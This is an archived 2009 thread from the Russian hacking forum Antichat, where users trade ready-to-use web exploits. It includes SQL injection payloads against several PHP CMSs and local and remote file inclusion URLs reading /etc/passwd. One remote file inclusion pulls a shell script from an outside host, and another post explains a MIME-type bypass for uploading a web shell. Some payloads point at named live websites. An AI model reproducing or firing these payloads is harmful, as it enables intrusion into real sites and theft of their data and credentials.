Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.11.2009, 00:15
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Model Agency Manager PRO
Bug : Sql Injection
view.php?user_id= [SQL]
Exploit :
Код:
1/**/and/**/1=0%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),version(),database(),user()),0,0,0/*
or
Код:
1%20union%20select%20user(),2,3,4/*
site:
Код:
http://www.fashionpage.com/view.php?user_id=408/**/and/**/1=0%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),version(),database(),user()),0,0,0/*&view=photos
|
|
|
13.11.2009, 04:09
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
webSPELL CMS v4.0 Blind SQL injection
Уязвимость затаилась в скрипте профиля (profile.php):
PHP код:
...
if($_GET['id']) {
$id = strip_tags($_GET['id']);
//profil: buddys
if($_GET['action'] == "buddys") {
eval ("\$title_profile = \"".gettemplate("title_profile")."\";");
echo $title_profile;
$buddys=safe_query("SELECT buddy FROM ".PREFIX."buddys WHERE userID='$id'");
...
Единственной попыткой защитить свое "детище" программисты сделали фильтрацию пережаваемого ГОТом значния с помощю функции strip_tags(), которая как известно удаляет HTML и PHP теги из строки.
Реализация:
Код:
http://localhost/1/index.php?site=profile&id=1'+and+substring(version(),1,1)=5+and+'1'='1
Код:
http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),1,1)))=114+and+'1'='1
Код:
http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),2,1)))=111+and+'1'='1
И так далее.
Для удачной эксплаьации magic_quotes_gpc должно быть в положении off
|
|
|
|
13.11.2009, 18:35
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
ShareCMS_0.1 Beta
CMS просто ужасная, сплошная SQL инъекция.
Уязвимы практически все скрипты.
Возьмем к примеру tortf.php:
PHP код:
...
$id = $_GET['id'];
$sql = mysql_query("SELECT admin FROM menu WHERE id = '$id'");
$row = mysql_fetch_array($sql);
...
По просьбам трудящихся - удобная для юзера реализация:
Код:
http://localhost/8/plugins/tortf.php?id=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+
Требуется mq = off
СMS с возможностью реализации при mq = on ждите позже.
Последний раз редактировалось Ins3t; 13.11.2009 в 18:41..
|
|
|
|
13.11.2009, 19:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
http://www.cita.illinois.edu/
демонстрация ARIA (Accessible Rich Internet Applications)
RFI
source_inline.php
PHP код:
$tpl = & new Template('../view/outer-inline-source.tpl');
...
echo $tpl->fetch();
/view/outer-inline-source.tpl
PHP код:
$ginc = $_GET['ginc'];
...
if (preg_match ("/^\//", $ginc) || preg_match ("/\.\./", $ginc))
$ginc = "";
....
include $ginc;
http://test.cita.uiuc.edu/aria/alert/view_inline.php?ginc=http://site.com/shell.txt |
|
|
|
14.11.2009, 04:52
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Z-BreakNews v0.1
Далее судьба автора неизвестна.
Думал нигде не встречу этой лабуды,но раз встретилось,напишу.
file: single.php
PHP код:
...
$row=mysql_fetch_array(mysql_query("SELECT * FROM news WHERE id=".$_GET['id']));
...
target: single.php?id=1+union+select+1,2,3,4+--+4
file:insert.php
PHP код:
...
if (($img1_type == $cert1) or ($img1_type == $cert2) or ($img1_type == $cert3))
...
target: Меняем mime-type в заголовках,заливаем шелл.
В довесок скажу, что никто не просит удалять install.php.
Последний раз редактировалось m0Hze; 14.11.2009 в 05:17..
|
|
|
|
14.11.2009, 05:03
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: 3MeMoS-phpNews
Version: 1.1
file: post_news_process.php
PHP код:
...
$query = "INSERT INTO news(title, news, author, date)
VALUES('".$_POST['title']."','".$_POST['news']."','".$_POST['author']."', now())";
...
target: Подменяем $_POST['news'] or $_POST['title'] or $_POST['author'] на необходимый sql-inj запрос.Так как тут insertдело может немножно осложниться.
|
|
|
|
14.11.2009, 12:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
mypage0.4
http://qgotchi.sourceforge.net/index.php
LFI
index.php
PHP код:
if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}
http://qgotchi.sourceforge.net/index.php?page=../../../../../../../../etc/passwd
|
|
|
|
14.11.2009, 13:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
c Copyright 2007 - 2009 ..:: Exclusiva Limpeza Comercial Industrial LTDA ::..
http://www.exclusivalimpeza.com.br
allow_url_include = Off LFI
allow_url_include = On RFI
index.php
PHP код:
if($incl=="")
include "meio.php";
else
include "${incl}.php";
magic_quotes_gpc = Off
http://www.exclusivalimpeza.com.br/index.php?incl=../../../../../../../../etc/passwd%00 |
|
|
|
14.11.2009, 16:25
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Новости 0.1а
Version: 0.1а
Author: jamper@ukr.net
file: comments.php
PHP код:
string 9: $id = $_GET['id'];
...
string 11: $query = "SELECT * FROM news WHERE id=$id";
...
string 28: $query = "SELECT * FROM news_comments WHERE id_news=$id";
...
target: comments.php?id={SQL-inj}
file: edit.php
PHP код:
....
$news = $_GET['news'];
$id = $_GET['id'];
$id2 = $_GET['id2'];
if($news!="")
{
$query = "UPDATE news SET news='$news' WHERE id=$id2";
$result = mysql_query ($query);
}
....
if($id>0)
{
$query = "SELECT * FROM news WHERE id=$id";
$result = mysql_query($query);
target: edit.php?id2={SQL-inj} or edit.php?id={SQL-inj}
//Незнаю кто автор этого чуда,но в каталоге сриптов он есть oO
|
|
|
|
14.11.2009, 22:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
TheContactBook.v.beta.3.2
http://sourceforge.net/projects/thecontactbook/files/TheContactBook.v.beta.3.2.zip/download
SQL
popup.php
TableManipulation.class.php
PHP код:
private function getContact($id) {
$SQL = "SELECT * FROM "._MYSQLTABLE_." WHERE "._PKEY_."=$id";
$result = $this->db->query($SQL);
if ($result->countRows()>0) { return $result->fetchRow(); }
http://localhost/TheContactBook.v.beta.3.2/TheContactBook/popup.php?status=details&id=-5+union+select+user(),version(),3,4,5,6,7,8,9,10,1 1+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
![Отправить сообщение для [x60]unu с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
